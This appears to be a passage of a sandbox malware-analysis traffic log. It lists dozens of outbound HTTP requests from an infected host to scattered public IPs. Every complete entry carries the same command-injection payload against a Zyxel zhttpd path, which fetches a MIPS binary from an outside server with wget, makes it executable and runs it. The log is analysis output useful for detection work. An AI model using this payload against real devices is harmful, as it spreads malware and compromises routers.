                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4037192.168.2.2345972102.151.170.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320310116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4038192.168.2.2357974101.111.63.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320369959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4039192.168.2.235618683.46.211.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320401907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4040192.168.2.2337214149.129.245.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320447922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4041192.168.2.2345374142.80.72.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320496082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4042192.168.2.234653869.222.246.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320524931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4043192.168.2.2352760219.141.90.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320564985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4044192.168.2.2347692200.3.251.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320584059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4045192.168.2.2333620183.177.96.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320622921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4046192.168.2.2342086184.232.185.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320667028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4047192.168.2.2356974193.250.94.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320698977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4048192.168.2.233375252.153.171.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320729971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4049192.168.2.233489648.39.201.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320807934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4050192.168.2.2341068167.63.108.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320841074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4051192.168.2.2339518219.170.97.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320873022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4052192.168.2.2347220199.78.184.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320924997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4053192.168.2.235663641.168.167.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320960045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4054192.168.2.235836477.77.98.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321003914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4055192.168.2.2345460161.220.223.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321038961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4056192.168.2.2358200143.137.211.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321084023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4057192.168.2.2337318102.120.156.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321095943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4058192.168.2.234481260.148.66.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321156025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4059192.168.2.234335442.167.250.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321196079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4060192.168.2.2335588158.222.81.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321233988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4061192.168.2.2346604103.105.166.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321297884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4062192.168.2.2353090169.62.7.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321326971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4063192.168.2.235733677.78.4.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321383953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4064192.168.2.2356018210.74.245.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321419954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4065192.168.2.2340450138.185.197.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321455956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4066192.168.2.2342438211.255.154.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321510077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4067192.168.2.235357488.225.11.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321540117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4068192.168.2.2359674133.11.21.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321588993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4069192.168.2.2337092137.70.86.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321640968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4070192.168.2.2346434161.233.102.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321683884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4071192.168.2.234381493.148.156.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321708918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4072192.168.2.2336822171.182.247.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321732044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4073192.168.2.23554508.130.94.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321772099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4074192.168.2.23544544.60.200.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321818113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4075192.168.2.2333350191.140.144.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321851969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4076192.168.2.235737662.59.180.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321871042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4077192.168.2.2345508195.89.128.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321929932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4078192.168.2.234628232.131.235.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.321980000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4079192.168.2.2358020107.236.28.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322029114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4080192.168.2.233925635.183.170.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322066069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4081192.168.2.234492089.239.149.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322086096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4082192.168.2.2360254206.86.38.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322118998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4083192.168.2.2342256199.198.120.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322153091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4084192.168.2.235387844.48.161.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322189093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4085192.168.2.234265290.202.128.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322235107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4086192.168.2.235407053.162.104.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322283983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4087192.168.2.234049450.35.66.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322319031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4088192.168.2.2337802102.24.50.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322393894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4089192.168.2.234725246.117.98.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322432041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4090192.168.2.2342222151.90.38.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322469950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4091192.168.2.23354061.125.128.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322523117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4092192.168.2.234930449.120.116.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322581053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4093192.168.2.234799014.81.84.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322604895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4094192.168.2.2353180125.173.213.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322660923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4095192.168.2.2345300192.243.136.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322674036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4096192.168.2.235301053.152.105.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322715044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4097192.168.2.233911889.211.131.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322756052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4098192.168.2.2355260118.109.112.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322788954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4099192.168.2.2355224189.118.29.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322832108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4100192.168.2.2357222202.253.132.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322890043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4101192.168.2.234097692.245.163.229443
